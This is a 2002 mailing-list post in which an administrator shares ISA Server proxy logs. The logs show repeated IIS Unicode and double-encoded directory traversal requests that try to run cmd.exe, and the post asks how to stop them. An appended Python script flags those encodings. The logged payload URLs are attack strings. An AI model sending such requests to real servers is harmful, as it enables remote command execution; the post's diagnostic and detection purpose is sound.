ISA logs.

  • From: Vinaykumar G <G.Vinay@xxxxxxxxx>
  • To: isalist@xxxxxxxxxxxxx
  • Date: Sun, 24 Feb 2002 19:44:43 -0800

Hi Jim,
       This is what I am getting in the ISA logs, and I have denoted that
xxx.xxx.xx.xx is pointing to some valid IP on the Internet. Then if the IP is
a valid one on the Internet, then these scripts are coming from the Internet.
Please confirm what has to be done to stop these scripts being executed.

xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:04
w3proxy ISA     -       www     -       -       -       145     3518    http
TCP     GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir -       -       401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:06
w3proxy ISA     -       www     -       -       -       97      3518    http
TCP     GET     http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:08
w3proxy ISA     -       www     -       -       -       97      3518    http
TCP     GET     http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
-       -       Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N       2002-02-23      05:57:08        w3proxy 
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:10
w3proxy ISA     -       www     -       -       -       97      3518    http
TCP     GET     http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
-       -       Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N       2002-02-23      05:57:11        w3proxy         anonymous
-       N       2002-02-23      05:57:11        w3proxy ISA     -       www
-       -       -       97      3518    http    TCP     GET
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       -
401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:13
w3proxy ISA     -       www     -       -       -       98      3518    http
TCP     GET     http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:15
w3proxy ISA     -       www     -       -       -       96      3518    http
TCP     GET     http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -
-               
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:17
w3proxy ISA     -       www     -       -       -       100     3518    http
TCP     GET
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       -
401     -       -       -
xxx.xxx.xx.xx   anonymous       -       N       2002-02-23      05:57:19
w3proxy ISA     -       www     -       -       -       96      3518    http
TCP     GET     http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
-       -       401     -       -       -

Regards,
vinay.
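
Added example, not part of the original post: a small Python detector for the encoding tricks visible in the request URLs above (repeated percent-encoding such as `%252f`, and the `%c0`/`%c1` lead bytes that never start a valid UTF-8 sequence). The names `classify`, `scan` and `fold` are illustrative, and the folding rule is an assumption about how a lenient decoder would treat those bytes.

```python
import re
from urllib.parse import unquote_to_bytes

URL = re.compile(r"https?://\S+")
OVERLONG = re.compile(rb"[\xc0\xc1](.)", re.S)  # C0/C1 never begin valid UTF-8
TRAVERSAL = re.compile(rb"\.\.[/\\]")

# Sample lines: URLs taken from the log entries in the post with the other
# fields trimmed; the last line is constructed benign traffic.
SAMPLE = [
    "xxx.xxx.xx.xx GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 401",
    "xxx.xxx.xx.xx GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 401",
    "xxx.xxx.xx.xx GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir 401",
    "xxx.xxx.xx.xx GET http://www/images/site%20logo.gif 200",
]

def fold(m):
    # Assumption: mimic a lenient decoder by keeping only the payload bits.
    return bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)])

def classify(url, max_rounds=5):
    """Return the set of reasons a request URL looks like encoded traversal."""
    path = url.split("?", 1)[0].encode("latin-1", "replace")
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(path)
        if decoded == path:          # nothing left to percent-decode
            break
        path, rounds = decoded, rounds + 1
    reasons = set()
    if rounds > 1:                   # a normal URL needs one decoding pass at most
        reasons.add("multi-layer-encoding")
    if OVERLONG.search(path):
        reasons.add("overlong-utf8")
    if TRAVERSAL.search(OVERLONG.sub(fold, path)):
        reasons.add("traversal")
    return reasons

def scan(lines):
    """Return (url, reasons) for every flagged request URL in the log lines."""
    found = ((u, classify(u)) for line in lines for u in URL.findall(line))
    return [(u, sorted(r)) for u, r in found if r]

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE):
        print(", ".join(reasons), url)
```
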


